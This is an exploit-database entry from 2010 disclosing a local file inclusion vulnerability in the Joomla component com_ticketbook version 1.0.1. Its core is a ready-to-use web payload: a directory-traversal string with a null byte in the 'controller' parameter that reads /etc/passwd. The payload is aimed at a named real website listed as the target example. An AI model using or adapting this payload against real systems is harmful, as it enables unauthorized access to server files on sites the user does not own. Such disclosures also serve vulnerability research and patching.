id: 11716
date: 04/11/2010
title: Joomla Component com_ticketbook Local File Inclusion Vulnerability
author: AntiSecurity
cves: 

==================================================================
Joomla Component com_ticketbook Local File Inclusion Vulnerability
==================================================================

# Exploit Title:
Joomla Component Ticketbook Local File Inclusion Vulnerability
 
# Date:
April 11 2010
 
# Author:
AntiSecurity
 
# Software Link:
http://www.demo-page.de/
 
# Version:
com_ticketbook version 1.0.1
 
# Tested on:
Linux
 
# Target example
http://www.expo-2010-reisen.com/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../etc/passwd%00



#  0day.today [2023-03-25]  #